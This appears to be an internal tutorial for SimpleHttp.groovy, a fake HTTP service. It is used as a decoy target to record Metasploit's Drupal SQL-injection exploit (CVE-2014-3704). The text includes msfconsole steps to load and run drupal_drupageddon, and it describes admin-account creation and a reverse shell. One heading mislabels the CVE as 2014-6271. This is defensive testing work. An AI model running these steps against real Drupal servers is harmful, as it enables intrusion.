[Toolkit] Simple Web Service - SimpleHttp.groovy - CVE:2014-3704

Preface 
Here we will tell how to use toolkit SimpleHttp.groovy to help us doing exploit CVE:2014-3704 from Metaexploit. Firstly, let's check our target CVE: 

The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conductSQL injection attacks via an array containing crafted keys.

The Drupal is an package provide content-management framework through HTTP service. The attacker can use target CVE which leverage SQL injection to create an account with administrator privilege and do what he or she wants. 

The exploit code from Metasploit is called Drupal HTTP Parameter Key/Value SQL Injection. When you read the code and you can observer below actions will be taken to exploit the target server: 

* Use CVE:2014-3704 to create an account with administrator privilege.
* Post a article which will use reversed shell for attacker to control the target server.

Toolkit Usage 
At current version of SimpleHttp.groovy, it should be used under MSFConsoleATF framework. And we will develop different HTTP handlers for each cve into single .groovy file and store it under path/ibm/iss/xf/tk/services/cve/http/. So in this case, there should be a groovy file called "CVE2014_3704_.groovy" into folder mentioned before. The  means different implementation for different attacking script. (For metasploit, the x=1) 

Start Http Service At Exploitable Target 
Please enter  and use below command to start Fake HTTP Service for CVE2014-3704: 

# ls # The content inside 
ibm libs poc scripts test
# groovy -cp "libs/*" ibm/iss/xf/tk/services/SimpleHttp.groovy CVE2014_3704_1 # Loading CVE2014_3704_1 handler
[Info] Listen on NIF=eth0: /172.16.58.50
[Info] Loading Handler='CVE2014_3704_1'...
[Info] WDir=/root/MSFConsoleATF...
[Info] Parsing class...
[Info] Create and register Handler...
[Test] Initialize...
[Info] Start Fake Http Service...

Run CVE-2014-6271 Through Metasploit 
Now let's move to Kali Linux. Please key-in "msfconsole" in the terminal console to enter the interface of MSF: 

# msfconsole
...
msf > // Now we are in MSF interface

Let's search our target cve: 

msf> search cve:2014-3704
...
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
...

Next step is to use this exploit: 

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) >

Let's check how to use this exploit: 

msf exploit(drupal_drupageddon) > show options

Here we have to setup RHOST as the IP of host running Fake HTTP service and do the exploit: 

msf exploit(drupal_drupageddon) > set RHOST 172.16.58.50
RHOST => 172.16.58.50
msf exploit(drupal_drupageddon) > run # Start exploit
...
[*] 172.16.58.50:80 - Calling preview page. Exploit should trigger...
msf exploit(drupal_drupageddon) >

Let's back to Fake Http Server console and it record the all attacking behaviors: 


Supplement 
* [Toolkit] Simple Web Service - SimpleHttp.groovy